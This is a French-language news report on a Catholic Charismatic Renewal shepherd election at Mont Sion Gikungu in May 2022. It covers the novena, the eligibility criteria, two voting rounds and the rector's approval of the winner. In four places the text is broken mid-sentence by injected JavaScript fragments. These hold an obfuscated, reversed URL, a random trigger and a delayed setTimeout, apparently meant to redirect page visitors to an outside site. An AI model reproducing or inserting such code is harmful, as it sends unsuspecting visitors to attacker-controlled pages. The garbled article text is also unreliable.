Au neuvième jour de prière préparative aux élections du nouveau Berger du Renouveau Charismatique Catholique de Mont Sion Gikungu, ce mercredi 04 mai 2022, il y a eu lieu l’élection à partir de 20 heures dans la salle Joseph Engling dudit Sanctuaire de la Reine de la paix et de la réconciliation de Mont Sion Gikungu.

Tous ceux qui participent à la prière de louange de lundi soir à partir de 18 heures, une prière dirigée par le Renouveau Charismatique Catholique et qui constituent cet électorat étaient présents et la salle était pleine à craquer au point que d’aucuns et surtout ceux venus un peu en retard se sont vus contraindre de se chercher une place à l’extérieur. Signalons aussi la présence du Recteur du Sanctuaire, le Père Herménégilde COYITUNGIYE, le Berger du RCC de la Paroisse saint Michel et le Secrétaire du Bureau diocésain du RCC.

Vers 18h30 a eu une petite animation afin d’accueillir tous les participants. Elle a été suivie par la prière introductive dite par le Berger sortant, Monsieur Diomède MUJOJOMA, qui vient de passer 3 ans à la tête du RCC Mont Sion Gikungu. Après cette prière et selon le programme, c’est la prière du chapelet du Saint Esprit qui a suivi, une prière tirée du livre « Puissance Divine d’Amour » approuvée par Mgr VITTORIO TOMASSETI, Évêque de Palestrina en Italie, le 12 mai 1997. Retenons que c’est un chant à l’Esprit Saint qui clôture ce chapelet.

Afin de mieux organiser ses élections, tous les bergers accompagnés chacun de 2 membres du noyau se sont rencontrés au Foyer de Charité pour une formation sur le déroulement des élections du Berger le 24 avril 2022. Parmi les informations pertinentes de ces élections, citons le fait que les candidats sont élus moins de 24 heures avant les élections et annoncés à l’électorat quelques minutes avant les élections. La propagande électorale est strictement interdite et pour être élu il faut avoir au moins 2/3 du suffrage universel. Une prière de neuf jours précède les élections et c’est au neuvième que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit avoir lieu les élections.

Le Berger du RCC de la Paroisse saint Michel a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc procédé à la lecture des critères qu’il faut pour qu’un Berger soit élu et ses caractères. C’est notamment la simplicité, la piété, avoir passé minimum 3 ans dans le RCC, être un visionnaire, respectueux, généreux, courois, disponible, quelqu’un qui écoute, accessible, humble, ne faisant pas partie d’un parti politique, qui sait lire et écrire et parle couramment le français, participant dans les congrès du RCC, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la vie chrétienne est un témoignage, organisateur des réunions, ….

Après avoir énumérer tout ça, le Berger sortant a procédé à la lecture des candidats.  Les électeurs seront seulement ceux qui ont participé à la neuvaine. Ils étaient 8 au total, 5 femmes et 3 hommes. Signalons que les votants étaient 102 et que les 8 candidats ont été, tous, désignés par le Berger, les responsables des fraternités et des ministères. Ils sont tous passés devant l’électorat avant le début des votes.  

Au premier, seuls Rukingamubiri Yves et Niyongere Consolate ont eu beaucoup de points mais aucune d’elles n’a totalité les 2/3. Il y a eu un deuxième tour et cette fois après décompte, Yves RUKINGAMUBIRI a obtenu la majorité. Comme le préconise par le RCC, c’est le Recteur du Sanctuaire qui devrait en premier se prononcer sur le candidat. Son avis favorable ou défavorable affecte les élections. Il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné un avis favorable au gagnant. Le nouveau Berger a lui aussi accepté solennellement cette tâche.